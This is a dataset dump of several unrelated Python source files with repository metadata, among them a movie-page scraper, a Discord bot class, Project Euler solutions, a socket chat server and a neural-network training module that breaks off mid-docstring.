dff2bc6e08afd2c6e14c4104a8b8783faf22be45 | 20da9b6b01d985646fd1b1753f312001a55e1e37 | /data-visualize-chain/spider/getDetails.py | 5d3f91b28a2ca80076f90005083e11f0490d47eb | [] | no_license | JessiZhu/starwar-visualization | 27aa01f74021e8dfd9c5534ebeb888e9015c4ff4 | f373c2e6afc9e11859f3dc285058cd4b512f5212 | refs/heads/master | 2020-05-16T05:03:21.022776 | 2019-04-22T15:17:06 | 2019-04-22T15:17:06 | 182,800,397 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,330 | py |
import urllib
import urllib.request
from bs4 import BeautifulSoup
# Scrape per-movie detail pages for every entry listed in douban_movie.txt
# (semicolon-separated: id;title;url;cover;rate) and write a caret-separated
# detail record per movie to douban_movie_detail.txt.
fr = open('douban_movie.txt','r' , encoding='utf8')
fw = open('douban_movie_detail.txt' , 'w' ,encoding='utf8')
fw.write('id^title^url^cover^rate^director^composer^actor^category^district^language^showtime^length^othername^description\n')
count = 1
firstline = True
for line in fr:
    # Skip the header row of the input file.
    if firstline:
        firstline = False
        continue
    line = line.split(';')
    movieId = line[0]
    title = line[1]
    url = line[2]
    cover = line[3]
    rate = line[4].rstrip('\n')
    # Fetch and parse the movie's detail page.
    response = urllib.request.urlopen(url=url)
    html = response.read()
    html = BeautifulSoup(html , 'html.parser')
    info = html.select('#info')[0]
    info = info.get_text().split('\n')
    print(str(count) + ' '+ str(len(info)) + ' '+ title)
    # for item in info:
    #     print(item)
    # The #info block yields either 13 or 12 lines depending on page layout;
    # the field positions shift by one between the two cases. Any other
    # length is skipped entirely.
    if len(info) == 13:
        director = info[1].split(':')[-1].strip()
        composer = info[2].split(':')[-1].strip()
        actor = info[3].split(':')[-1].strip()
        category = info[4].split(':')[-1].strip()
        district = info[6].split(':')[-1].strip()
        language = info[7].split(':')[-1].strip()
        showtime = info[8].split(':')[-1].strip()
        length = info[9].split(':')[-1].strip()
        othername = info[10].split(':')[-1].strip()
    elif len(info) == 12:
        director = info[1].split(':')[-1].strip()
        composer = info[2].split(':')[-1].strip()
        actor = info[3].split(':')[-1].strip()
        category = info[4].split(':')[-1].strip()
        district = info[5].split(':')[-1].strip()
        language = info[6].split(':')[-1].strip()
        showtime = info[7].split(':')[-1].strip()
        length = info[8].split(':')[-1].strip()
        othername = info[9].split(':')[-1].strip()
    else:
        continue
    # Flatten the synopsis to a single line (newlines become tabs) so it
    # fits the one-record-per-line output format.
    description = html.find_all('span' , attrs={"property": "v:summary"})[0].get_text().strip()
    description = description.lstrip().lstrip('\n\t').rstrip().rstrip('\n\t').replace('\n', '\t')
    record = str(movieId) +'^'+ title +'^'+ url +'^'+ cover +'^'+ str(rate) +'^'+ director +'^'+ composer +'^'+ actor +'^'+ category +'^'+ district +'^'+ language +'^'+ str(showtime) +'^'+ str(length) +'^'+ othername +'^'+ description+'\n'
    fw.write(record)
    count = count + 1
fr.close()
fw.close()
| [
"417734353@qq.com"
] | 417734353@qq.com |
fbe4700581083d0d46fa73f4777bfc8b5233070f | 4efda3f2eba778d083a7c34d6fdbad8665b91bb0 | /morphonets/utils.py | c0f80e35780d7a44abd37185b024792c709c8321 | [] | no_license | SigmaQuan/morphonet | d615356e7f99b0483d90adfe67e026aa3898c27d | 6dc8653f5b433bb3d981223e966931e087abb784 | refs/heads/master | 2021-05-12T07:39:30.967582 | 2018-01-12T14:38:00 | 2018-01-12T14:38:00 | 114,373,833 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,023 | py | # -*- coding: utf-8 -*-
"""
Help classes and functions.
"""
import numpy as np
import random
import time
# from keras.callbacks import Callback
# from math import exp
# import matplotlib.pyplot as plt
# import numpy as np
# from keras import losses
# from keras import backend as K
def initialize_random_seed():
    """Seed both numpy's and the stdlib's RNG from the current wall-clock second."""
    current_seed = int(time.time())
    for seeder in (np.random.seed, random.seed):
        seeder(current_seed)
def generate_random_binomial_(row, col):
    """Return a (row, col) uint8 matrix of independent fair coin flips (0/1)."""
    draws = np.random.binomial(1, 0.5, size=(row, col))
    return draws.astype(np.uint8)
def check_contain_chinese(check_str):
    """Return True if ``check_str`` contains any CJK unified ideograph.

    Generalized: the original called ``check_str.decode('utf-8')``, which only
    works on Python 2 ``str`` / Python 3 ``bytes``. This version accepts both
    ``bytes`` (decoded as UTF-8, preserving the old behavior) and text ``str``.
    """
    text = check_str.decode('utf-8') if isinstance(check_str, bytes) else check_str
    for ch in text:
        # Basic CJK Unified Ideographs block.
        if u'\u4e00' <= ch <= u'\u9fff':
            return True
    return False
def pre_process_words(one_line):
    """Normalize every token of ``one_line`` in place (via pre_process) and return it."""
    for idx, token in enumerate(one_line):
        one_line[idx] = pre_process(token)
    return one_line
def pre_process(one_word):
    """Strip newline characters from a word that ends in one.

    Words shorter than two characters, or without a trailing newline, are
    returned unchanged. The echo of the offending word (debug print) is kept.
    """
    ends_in_newline = len(one_word) >= 2 and one_word[-1] == u'\n'
    if not ends_in_newline:
        return one_word
    print(one_word)
    return one_word.replace(u'\n', u'')
| [
"quan.zhibin@gmail.com"
] | quan.zhibin@gmail.com |
7f1f1571eeef254cb2419b037dea23d48450dfd5 | 1fda1b125008512c0c8f6974bdb79a7333f05804 | /chuckle_bot/single_channel_bot.py | f198aa12380957eaa55d67b6c5eda0d17e69368a | [
"Apache-2.0"
] | permissive | GTOliver/Chucklebot | 8a8a75ffa4fa9e127ff1b2cb3c3b4be1d7fd72b8 | 488ee5476a731ebc89db2ae6d69d7de2fcd76925 | refs/heads/main | 2023-01-23T03:08:17.986373 | 2020-12-12T01:04:20 | 2020-12-12T01:04:20 | 320,717,436 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,372 | py | import discord
class Bot(discord.Client):
    # Requires Python 3.8+ (walrus operator in on_ready below).
    def __init__(self, guild_name, channel_id, logger=None, **kwargs):
        """
        Bot for use with a single Discord Guild and Text Channel

        :param guild_name: The name of the Discord Guild to join
        :type guild_name: string
        :param channel_id: The ID of the channel to be active in
        :type channel_id: int
        :param logger: An optional logger with a ``log_message(str)`` method
        """
        super().__init__(**kwargs)
        self._main_guild_name = guild_name
        self._main_channel_id = channel_id
        self._logger = logger
        # Resolved lazily in on_ready, once the gateway connection exists.
        self.main_guild = None
        self.main_channel = None
        self._on_ready_msg = None
        self._message_handler = None
    def set_ready_message(self, msg):
        """ Set a message to be sent to the channel on connection

        :param msg: Message to be sent
        :type msg: string
        """
        self._on_ready_msg = msg
    def set_message_handler(self, handler):
        """ Set a handler to respond to Discord messages in the main channel.

        The handler must be an async function which takes a discord.Message.

        :param handler: The handler for message
        :type handler: An async function (discord.Message)
        """
        self._message_handler = handler
    async def on_ready(self):
        # Locate the configured guild/channel among those the bot can see.
        self._log_info("Connection Established")
        for guild in self.guilds:
            if guild.name == self._main_guild_name:
                self.main_guild = guild
                break
        self.main_channel = self.main_guild.get_channel(self._main_channel_id)
        if msg := self._on_ready_msg:
            await self.send_message(msg)
    async def on_message(self, message):
        # Only react to the main channel, and ignore the bot's own messages.
        if message.channel.id == self._main_channel_id and not message.author.id == self.user.id:
            self._log_info("Received message in main channel. ID: {}".format(message.id))
            await self._message_handler(message)
    async def send_message(self, message):
        """ Send a message to the main channel

        :param message: The text to send to the server
        :type message: string
        """
        self._log_info("Sending message: {}".format(message))
        await self.main_channel.send(message)
    def _log_info(self, info):
        # Logging is optional; silently no-op when no logger was supplied.
        if self._logger:
            self._logger.log_message(info)
| [
"gtoliver90@gmail.com"
] | gtoliver90@gmail.com |
b78211423a07f04e32c92442125f76f6b06bb721 | 5c928ded0bd75bec3a36a0b47a149876aa897d45 | /Problem056.py | 3a6818660aed9c805c353fa2259005e9613eb888 | [] | no_license | AkihikoTakahashi/ProjectEuler | 3925b4b6384bb92a5eb1d49a7092962c16dbca3e | 1734b1b19778511b4a9d5d2cc7402153b9b3d51d | refs/heads/master | 2023-06-22T18:54:30.021732 | 2023-06-09T02:41:26 | 2023-06-09T02:41:26 | 191,503,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 266 | py | # coding: utf-8
def digit_sum(n):
    """Return the sum of the decimal digits of ``n`` (0 for n <= 0)."""
    total = 0
    while n > 0:
        n, digit = divmod(n, 10)
        total += digit
    return total
def main():
    """Largest digit sum of a**b for 1 <= a, b < 100 (Project Euler 56)."""
    best = 0
    for a in range(1, 100):
        for b in range(1, 100):
            best = max(best, digit_sum(pow(a, b)))
    return best
if __name__ == '__main__':
print(main())
| [
"fermatslasttheoremisdifficult@gmail.com"
] | fermatslasttheoremisdifficult@gmail.com |
9383a57b449072c8fb83a0149c8e475acf633851 | 84f652ced4a7b1ae1e173ffaa89af6e7dcdcca9c | /ssbio/protein/sequence/properties/kinetic_folding_rate.py | 0c00d07dd1a2d97259dee196bd91f6e2ddaa71ba | [
"MIT"
] | permissive | JoshuaMeyers/ssbio | a1cf1aa521d2ca9248f0efb6c042d292f6a8c320 | 624618602437e2c2e4adf90962adcef3af2d5b40 | refs/heads/master | 2023-01-24T20:14:33.956913 | 2020-12-07T16:50:58 | 2020-12-07T16:50:58 | 319,367,246 | 0 | 0 | MIT | 2020-12-07T15:47:45 | 2020-12-07T15:47:45 | null | UTF-8 | Python | false | false | 2,456 | py | __author__ = 'Ke Chen'
__email__ = "kec003@ucsd.edu"
# TODO: replace urllib usage with six library
try:
from urllib.request import urlopen
from urllib.request import build_opener
from urllib.request import HTTPCookieProcessor
from urllib.parse import urlparse
from urllib.parse import urlencode
except ImportError:
from urlparse import urlparse
from urllib2 import urlopen
from urllib import urlencode
from urllib2 import build_opener
from urllib2 import HTTPCookieProcessor
import math
import scipy.constants
import ssbio.protein.sequence.utils
def get_foldrate(seq, secstruct):
    """Submit sequence and structural class to FOLD-RATE calculator (http://www.iitm.ac.in/bioinfo/fold-rate/)
    to calculate kinetic folding rate.

    Args:
        seq (str, Seq, SeqRecord): Amino acid sequence
        secstruct (str): Structural class: ``all-alpha``, ``all-beta``, ``mixed``, or ``unknown``

    Returns:
        str: Kinetic folding rate k_f, as the numeric substring scraped from
            the result page (callers must convert to float themselves).

    """
    seq = ssbio.protein.sequence.utils.cast_to_str(seq)
    url = 'http://www.iitm.ac.in/bioinfo/cgi-bin/fold-rate/foldrateCalculator.pl'
    # POST the form fields the CGI script expects.
    values = {'sequence': seq, 'eqn': secstruct}
    data = urlencode(values)
    data = data.encode('ASCII')
    response = urlopen(url, data)
    # Screen-scrape the rate out of the HTML response: the value sits between
    # '=' and '/sec' within 70 characters of the 'The folding rate,' marker.
    # NOTE(review): if the marker is absent, str.find returns -1 and the
    # slice silently yields garbage — verify against a failed submission.
    result = str(response.read())
    ind = str.find(result, 'The folding rate,')
    result2 = result[ind:ind + 70]
    ind1 = str.find(result2, '=')
    ind2 = str.find(result2, '/sec')
    rate = result2[ind1 + 2:ind2]
    return rate
def get_foldrate_at_temp(ref_rate, new_temp, ref_temp=37.0):
    """Scale a predicted kinetic folding rate to a new temperature.

    Uses the relationship ln(k_f) ∝ 1/T with a fixed slope.

    Args:
        ref_rate (float): ln of the folding rate at ``ref_temp`` (from
            :func:`get_foldrate`).
        new_temp (float): Target temperature in degrees C.
        ref_temp (float): Reference temperature in degrees C (default 37).

    Returns:
        float: Kinetic folding rate k_f at ``new_temp``.
    """
    # Slope of ln(k_f) vs 1/T; little data exists for this value, but its
    # effect on downstream model growth rates is very small.
    slope = 22000
    kelvin_ref = float(ref_temp) + 273.15
    kelvin_new = float(new_temp) + 273.15
    intercept = float(ref_rate) + slope / kelvin_ref
    return math.exp(intercept - slope / kelvin_new)
"nmih@ucsd.edu"
] | nmih@ucsd.edu |
f6ea1e9dc4664869333becf4eabb4e33c8a9ff08 | 3e74c6405a5825c128bd2841484b9394e5a3e6be | /venv/Scripts/pip-script.py | d01ca0c6db4c6a37c1bd962a471f383bfd47ae0f | [] | no_license | instance0326/t_ti | e273dd192fafd01778dd9ebed2bf24a276310ed4 | 0eb15187b762f357592745543881e118605721b8 | refs/heads/master | 2020-08-27T22:56:21.105510 | 2019-10-25T13:08:16 | 2019-10-25T13:08:16 | 217,509,892 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 409 | py | #!C:\Users\User\PycharmProjects\opencv\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
    # Normalize argv[0]: strip the setuptools wrapper suffix ('-script.py'
    # or '.exe') so pip sees its canonical program name.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    # Delegate to the 'pip' console_scripts entry point and propagate its
    # return value as the process exit code.
    sys.exit(
        load_entry_point('pip==19.0.3', 'console_scripts', 'pip')()
    )
| [
"instance0326@gmail.com"
] | instance0326@gmail.com |
1b03a134c4d0562307042d27baa1c91aec3d2484 | e97451f42a5bb5834baf581dcbbcf273eb6562ff | /[060] Prime pair sets/main.py | c946ea518c0f4d7dfe45f4e931cabf0472780557 | [] | no_license | m-tkach/ProjectEuler | 561d13137a8e5e9e63f028e0dd3abd57aa788b9e | ee118e0889fa0c48662f62b42708c2009ddbc4ce | refs/heads/master | 2020-04-15T01:54:24.682833 | 2015-04-13T20:23:44 | 2015-04-13T20:23:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,339 | py | SIZE = 5
primes = [2, 3,]
def gen_primes(n):
    """Extend the module-level ``primes`` list with all primes up to ``n``.

    Trial division against the primes found so far; assumes ``primes``
    already holds [2, 3, ...] with an odd last element.
    """
    if primes[-1] >= n:
        return
    # Only odd candidates need checking beyond the current largest prime.
    for x in range(primes[-1]+2, n+1, 2):
        for p in primes:
            if p * p > x:
                # No divisor <= sqrt(x) found: x is prime.
                primes.append(x)
                break
            if x % p == 0:
                break
def is_prime(x):
    """Primality test by trial division against the cached ``primes`` list.

    Ensures the cache covers sqrt(x) first, so the loop below is complete.
    """
    gen_primes(int(x**0.5) + 1)
    for p in primes:
        if p * p > x:
            return True
        if x % p == 0:
            return False
    return True
def is_div_by_3(x, y):
    """True when the concatenation of x and y is divisible by 3.

    Uses the digit-sum rule: a number is divisible by 3 iff its decimal
    digit sum is, so the combined digit sum of x and y suffices.
    """
    total = 0
    for value in (x, y):
        while value > 0:
            value, digit = divmod(value, 10)
            total += digit
    return total % 3 == 0
def is_ok(x, y):
    """True when both concatenations xy and yx are prime.

    The cheap digit-sum divisibility-by-3 check rejects most pairs before
    the expensive primality tests run.
    """
    if is_div_by_3(x, y):
        return False
    a = int(str(x) + str(y))
    if not is_prime(a):
        return False
    b = int(str(y) + str(x))
    return is_prime(b)
def result(candidates):
    # Objective value of a candidate set: the sum of its primes.
    return sum(candidates)
def is_cut(candidates, last_index, current_answer):
    """Branch-and-bound pruning test: True when this branch cannot beat
    ``current_answer`` (the best sum found so far)."""
    res = result(candidates)
    # Already at or above the best known sum.
    if res >= current_answer:
        return True
    # NOTE(review): per-element bound — prunes when one chosen prime alone
    # exceeds (SIZE - i) * current_answer; the rationale for this particular
    # bound is unclear from the code, verify it is not over-eager.
    for i, c in enumerate(candidates):
        if c > (SIZE - i) * current_answer:
            return True
    if last_index + 1 < len(primes):
        # Optimistic lower bound: fill the remaining slots with the smallest
        # prime still available.
        left = SIZE - len(candidates)
        min_left_weight = left * primes[last_index + 1]
        if res + min_left_weight >= current_answer:
            return True
    return False
def go(candidates, last_index, current_answer):
    """Depth-first search extending ``candidates`` with primes beyond
    ``last_index``; returns the best (smallest) sum found, or
    ``current_answer`` if nothing better exists on this branch."""
    if is_cut(candidates, last_index, current_answer):
        return current_answer
    if len(candidates) == SIZE:
        # Complete set of SIZE pairwise-concatenatable primes.
        res = result(candidates)
        if res < current_answer:
            return res
        return current_answer
    for i, p in enumerate(primes[last_index+1:]):
        for c in candidates:
            if not is_ok(p, c):
                break
        else:
            # p is compatible with every chosen prime: recurse with it added,
            # then backtrack (candidates is mutated in place).
            candidates.append(p)
            res = go(candidates, i+last_index+1, current_answer)
            if current_answer > res:
                current_answer = res
            candidates.pop()
    return current_answer
def calc():
    """Project Euler 60: minimum sum of SIZE primes whose pairwise
    concatenations are all prime."""
    # Sentinel upper bound; any real solution is far below this.
    answer = 1000000000
    # NOTE(review): the search only seeds from primes below 2000 (gen_primes
    # grows the cache further on demand) — presumed sufficient for SIZE=5.
    gen_primes(2000)
    for i, p in enumerate(primes):
        res = go([p,], i, answer)
        if res < answer:
            answer = res
    return answer
print(calc())
| [
"m.tkach@samsung.com"
] | m.tkach@samsung.com |
013db56b03036275322d68bfb8a9d4f509a487c8 | 927d302f021a9ebbf72c19e40667a61c4637d120 | /GUI Implementation Working/server.py | 84bd401ff5a87e1bc01fc7ca08c12890e2736655 | [] | no_license | Sumit112192/Python-Chatroom | 9f8bd24622fe5fb9fccdab0f90f3e300487acef0 | 96636c16c012316d09242769197a162341a8efcf | refs/heads/main | 2023-05-28T11:31:01.667284 | 2021-06-15T21:42:41 | 2021-06-15T21:42:41 | 377,807,712 | 0 | 0 | null | 2021-06-17T11:31:35 | 2021-06-17T11:31:35 | null | UTF-8 | Python | false | false | 3,749 | py | import socket
import threading
host = '127.0.0.1'
port = 55555
# to start server
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((host, port))
server.listen()
clients = []
nicknames = []
def broadcast_msg(message, bmsg):
    """Send ``message`` (bytes) to every connected client and print ``bmsg``
    (the same text, decoded) to the server console log."""
    for client in clients:
        client.send(message)
    print("\n----------------- Broadcast Log ------------")
    print("\t\t\t\t\t" + bmsg)
    print("------------")
def manage(client):
    """Per-client receive loop (run in its own thread).

    Handles admin-only KICK/BAN commands and rebroadcasts everything else.
    On any receive/send failure the client is deregistered and the loop ends.
    """
    while True:
        try:
            message = client.recv(1024).decode('ascii')
            if message.startswith('KICK'):
                # Only the 'admin' nickname may kick; payload follows 'KICK '.
                if nicknames[clients.index(client)] == 'admin':
                    name_to_kick = message[5:]
                    kick_user(name_to_kick)
                else:
                    client.send('Command was refused!'.encode('ascii'))
            elif message.startswith('BAN'):
                if nicknames[clients.index(client)] == 'admin':
                    name_to_ban = message[4:]
                    kick_user(name_to_ban)
                    # Persist the ban; receive() checks this file on connect.
                    with open('bans.txt', 'a') as f:
                        f.write(f'{name_to_ban}\n')
                    print(f'{name_to_ban} was banned from the server')
                else:
                    client.send('Command was refused!'.encode('ascii'))
            else:
                message2 = message.encode('ascii')
                broadcast_msg(message2, message)
        # NOTE(review): bare except — also swallows KeyboardInterrupt and any
        # programming error in the handlers above; consider narrowing to
        # (OSError, UnicodeError, ValueError).
        except: # on exception
            if client in clients:
                index = clients.index(client)
                clients.remove(client)
                client.close()
                nickname = nicknames[index]
                bmsg = f'{nickname} has left the chat.'
                broadcast_msg(
                    bmsg.encode('ascii'), bmsg)
                print("Client has left the chat with nickname ", nickname)
                nicknames.remove(nickname)
            break
def receive():
    """Accept loop: register each new client and spawn a manage() thread.

    Protocol on connect: server sends 'NICK', client replies with a nickname;
    banned names are refused, and the 'admin' nickname must also answer a
    password challenge.
    """
    while True:
        client, address = server.accept()
        print(f'New Client is connected with the Address = {str(address)}')
        client.send('NICK'.encode('ascii'))
        nickname = client.recv(1024).decode('ascii') # nick
        # Refuse names persisted by the BAN command (one name per line).
        with open('bans.txt', 'r') as f:
            bans = f.readlines()
        if f'{nickname}\n' in bans:
            client.send('BAN'.encode('ascii')) # ban
            client.close()
            continue
        if nickname == 'admin':
            # NOTE(review): hard-coded plaintext password sent over an
            # unencrypted socket — fine for a toy chatroom only.
            client.send('pass'.encode('ascii'))
            password = client.recv(1024).decode('ascii') # pass
            if password != 'adminpass':
                client.send('Incorrect'.encode('ascii'))
                client.close()
                continue
        # Registration: the two lists are kept index-parallel.
        nicknames.append(nickname)
        clients.append(client)
        print(f'Client\'s nickname : {nickname}')
        bmsg = f'{nickname} has just joined the chat !\n'
        broadcast_msg(bmsg.encode('ascii'), bmsg)
        client.send(f'Successfully Connected to Server\n '.encode('ascii'))
        thread = threading.Thread(target=manage, args=(client,))
        thread.start()
def kick_user(name):
    """Disconnect the client registered under ``name``.

    Removes the client from the parallel ``clients``/``nicknames`` lists,
    notifies it, closes its socket, and broadcasts the kick. Unknown names
    are silently ignored.
    """
    try:
        if name in nicknames:
            name_index = nicknames.index(name)
            client_to_kick = clients[name_index]
            clients.remove(client_to_kick)
            client_to_kick.send('You were kicked '.encode('ascii'))
            client_to_kick.close()
            nicknames.remove(name)
            bmsg = f'{name} was kicked by an admin'
            broadcast_msg(bmsg.encode('ascii'), bmsg)
    except (OSError, ValueError, IndexError) as exc:
        # FIX: was a bare ``except`` printing "error here", which swallowed
        # every exception without detail. Narrowed to the realistic failures
        # (socket errors; list lookups if clients/nicknames desynchronize)
        # and report what actually went wrong.
        print(f"kick_user: failed to kick {name!r}: {exc}")
print("-----------------------------server is running-------------------------")
receive()
| [
"noreply@github.com"
] | Sumit112192.noreply@github.com |
0fb50cf402fbbce2880c35c8958732b192e5f964 | a0bcd1fbd8e95fff14b0780187de5d6130a07dca | /src/neural/corpus/network2.py | f2640fceafd51500ba884604b3bb228bebfcea52 | [] | no_license | ankit96/rejigthesystem | b8f9eb864562d6fbc9fd4b157986065a8630368d | a155349f3f5f42fae7dc33ef4cc8af481b428721 | refs/heads/master | 2022-08-12T03:10:44.233563 | 2018-03-10T20:06:58 | 2018-03-10T20:06:58 | 60,528,888 | 1 | 1 | null | 2022-07-06T19:23:29 | 2016-06-06T13:13:58 | OpenEdge ABL | UTF-8 | Python | false | false | 13,965 | py | """network2.py
~~~~~~~~~~~~~~
An improved version of network.py, implementing the stochastic
gradient descent learning algorithm for a feedforward neural network.
Improvements include the addition of the cross-entropy cost function,
regularization, and better initialization of network weights. Note
that I have focused on making the code simple, easily readable, and
easily modifiable. It is not optimized, and omits many desirable
features.
"""
#### Libraries
# Standard library
import json
import random
import sys
# Third-party libraries
import numpy as np
#### Define the quadratic and cross-entropy cost functions
class QuadraticCost(object):

    @staticmethod
    def fn(a, y):
        """Cost 0.5*||a - y||^2 for network output ``a`` and target ``y``."""
        residual = a - y
        return 0.5 * np.linalg.norm(residual) ** 2

    @staticmethod
    def delta(z, a, y):
        """Output-layer error for the quadratic cost (needs sigmoid'(z))."""
        return (a - y) * sigmoid_prime(z)
class CrossEntropyCost(object):

    @staticmethod
    def fn(a, y):
        """Cross-entropy cost for output ``a`` and target ``y``.

        np.nan_to_num keeps the sum finite when a slot has both ``a`` and
        ``y`` at 1.0 (where (1-y)*log(1-a) would otherwise produce nan).
        """
        per_neuron = -y * np.log(a) - (1 - y) * np.log(1 - a)
        return np.sum(np.nan_to_num(per_neuron))

    @staticmethod
    def delta(z, a, y):
        """Output-layer error; ``z`` is unused but kept so the signature
        matches the other cost classes."""
        return (a - y)
#### Main Network class
class Network(object):
    # NOTE(review): this class is Python 2 code (print statements, xrange) —
    # it will not run unmodified under Python 3.
    def __init__(self, sizes, cost=CrossEntropyCost):
        """The list ``sizes`` contains the number of neurons in the respective
        layers of the network.  For example, if the list was [2, 3, 1]
        then it would be a three-layer network, with the first layer
        containing 2 neurons, the second layer 3 neurons, and the
        third layer 1 neuron.  The biases and weights for the network
        are initialized randomly, using
        ``self.default_weight_initializer`` (see docstring for that
        method).

        """
        self.num_layers = len(sizes)
        self.sizes = sizes
        self.default_weight_initializer()
        self.cost=cost
    def default_weight_initializer(self):
        """Initialize each weight using a Gaussian distribution with mean 0
        and standard deviation 1 over the square root of the number of
        weights connecting to the same neuron.  Initialize the biases
        using a Gaussian distribution with mean 0 and standard
        deviation 1.

        Note that the first layer is assumed to be an input layer, and
        by convention we won't set any biases for those neurons, since
        biases are only ever used in computing the outputs from later
        layers.

        """
        self.biases = [np.random.randn(y, 1) for y in self.sizes[1:]]
        # 1/sqrt(fan-in) scaling keeps early activations from saturating.
        self.weights = [np.random.randn(y, x)/np.sqrt(x)
                        for x, y in zip(self.sizes[:-1], self.sizes[1:])]
    def large_weight_initializer(self):
        """Initialize the weights using a Gaussian distribution with mean 0
        and standard deviation 1.  Initialize the biases using a
        Gaussian distribution with mean 0 and standard deviation 1.

        Note that the first layer is assumed to be an input layer, and
        by convention we won't set any biases for those neurons, since
        biases are only ever used in computing the outputs from later
        layers.

        This weight and bias initializer uses the same approach as in
        Chapter 1, and is included for purposes of comparison.  It
        will usually be better to use the default weight initializer
        instead.

        """
        self.biases = [np.random.randn(y, 1) for y in self.sizes[1:]]
        self.weights = [np.random.randn(y, x)
                        for x, y in zip(self.sizes[:-1], self.sizes[1:])]
    def feedforward(self, a):
        """Return the output of the network if ``a`` is input."""
        for b, w in zip(self.biases, self.weights):
            a = sigmoid(np.dot(w, a)+b)
        return a
    def SGD(self, training_data, epochs, mini_batch_size, eta,
            lmbda = 0.0,
            evaluation_data=None,
            monitor_evaluation_cost=False,
            monitor_evaluation_accuracy=False,
            monitor_training_cost=False,
            monitor_training_accuracy=False):
        """Train the neural network using mini-batch stochastic gradient
        descent.  The ``training_data`` is a list of tuples ``(x, y)``
        representing the training inputs and the desired outputs.  The
        other non-optional parameters are self-explanatory, as is the
        regularization parameter ``lmbda``.  The method also accepts
        ``evaluation_data``, usually either the validation or test
        data.  We can monitor the cost and accuracy on either the
        evaluation data or the training data, by setting the
        appropriate flags.  The method returns a tuple containing four
        lists: the (per-epoch) costs on the evaluation data, the
        accuracies on the evaluation data, the costs on the training
        data, and the accuracies on the training data.  All values are
        evaluated at the end of each training epoch.  So, for example,
        if we train for 30 epochs, then the first element of the tuple
        will be a 30-element list containing the cost on the
        evaluation data at the end of each epoch. Note that the lists
        are empty if the corresponding flag is not set.

        """
        if evaluation_data: n_data = len(evaluation_data)
        n = len(training_data)
        evaluation_cost, evaluation_accuracy = [], []
        training_cost, training_accuracy = [], []
        for j in xrange(epochs):
            # Fresh shuffle each epoch so mini-batches differ between epochs.
            random.shuffle(training_data)
            mini_batches = [
                training_data[k:k+mini_batch_size]
                for k in xrange(0, n, mini_batch_size)]
            for mini_batch in mini_batches:
                self.update_mini_batch(
                    mini_batch, eta, lmbda, len(training_data))
            print "Epoch %s training complete" % j
            # Each monitoring flag below costs a full pass over its dataset.
            if monitor_training_cost:
                cost = self.total_cost(training_data, lmbda)
                training_cost.append(cost)
                print "Cost on training data: {}".format(cost)
            if monitor_training_accuracy:
                accuracy = self.accuracy(training_data, convert=True)
                training_accuracy.append(accuracy)
                print "Accuracy on training data: {} / {}".format(
                    accuracy, n)
            if monitor_evaluation_cost:
                cost = self.total_cost(evaluation_data, lmbda, convert=True)
                evaluation_cost.append(cost)
                print "Cost on evaluation data: {}".format(cost)
            if monitor_evaluation_accuracy:
                accuracy = self.accuracy(evaluation_data)
                evaluation_accuracy.append(accuracy)
                print "Accuracy on evaluation data: {} / {}".format(
                    self.accuracy(evaluation_data), n_data)
            print
        return evaluation_cost, evaluation_accuracy, \
            training_cost, training_accuracy
    def update_mini_batch(self, mini_batch, eta, lmbda, n):
        """Update the network's weights and biases by applying gradient
        descent using backpropagation to a single mini batch.  The
        ``mini_batch`` is a list of tuples ``(x, y)``, ``eta`` is the
        learning rate, ``lmbda`` is the regularization parameter, and
        ``n`` is the total size of the training data set.

        """
        nabla_b = [np.zeros(b.shape) for b in self.biases]
        nabla_w = [np.zeros(w.shape) for w in self.weights]
        for x, y in mini_batch:
            delta_nabla_b, delta_nabla_w = self.backprop(x, y)
            nabla_b = [nb+dnb for nb, dnb in zip(nabla_b, delta_nabla_b)]
            nabla_w = [nw+dnw for nw, dnw in zip(nabla_w, delta_nabla_w)]
        # The (1 - eta*lmbda/n) factor is the L2 weight-decay term.
        self.weights = [(1-eta*(lmbda/n))*w-(eta/len(mini_batch))*nw
                        for w, nw in zip(self.weights, nabla_w)]
        self.biases = [b-(eta/len(mini_batch))*nb
                       for b, nb in zip(self.biases, nabla_b)]
    def backprop(self, x, y):
        """Return a tuple ``(nabla_b, nabla_w)`` representing the
        gradient for the cost function C_x.  ``nabla_b`` and
        ``nabla_w`` are layer-by-layer lists of numpy arrays, similar
        to ``self.biases`` and ``self.weights``."""
        nabla_b = [np.zeros(b.shape) for b in self.biases]
        nabla_w = [np.zeros(w.shape) for w in self.weights]
        # feedforward
        activation = x
        activations = [x] # list to store all the activations, layer by layer
        zs = [] # list to store all the z vectors, layer by layer
        for b, w in zip(self.biases, self.weights):
            z = np.dot(w, activation)+b
            zs.append(z)
            activation = sigmoid(z)
            activations.append(activation)
        # backward pass
        delta = (self.cost).delta(zs[-1], activations[-1], y)
        nabla_b[-1] = delta
        nabla_w[-1] = np.dot(delta, activations[-2].transpose())
        # Note that the variable l in the loop below is used a little
        # differently to the notation in Chapter 2 of the book.  Here,
        # l = 1 means the last layer of neurons, l = 2 is the
        # second-last layer, and so on.  It's a renumbering of the
        # scheme in the book, used here to take advantage of the fact
        # that Python can use negative indices in lists.
        for l in xrange(2, self.num_layers):
            z = zs[-l]
            sp = sigmoid_prime(z)
            delta = np.dot(self.weights[-l+1].transpose(), delta) * sp
            nabla_b[-l] = delta
            nabla_w[-l] = np.dot(delta, activations[-l-1].transpose())
        return (nabla_b, nabla_w)
    def accuracy(self, data, convert=False):
        """Return the number of inputs in ``data`` for which the neural
        network outputs the correct result. The neural network's
        output is assumed to be the index of whichever neuron in the
        final layer has the highest activation.

        The flag ``convert`` should be set to False if the data set is
        validation or test data (the usual case), and to True if the
        data set is the training data. The need for this flag arises
        due to differences in the way the results ``y`` are
        represented in the different data sets.  In particular, it
        flags whether we need to convert between the different
        representations.  It may seem strange to use different
        representations for the different data sets.  Why not use the
        same representation for all three data sets?  It's done for
        efficiency reasons -- the program usually evaluates the cost
        on the training data and the accuracy on other data sets.
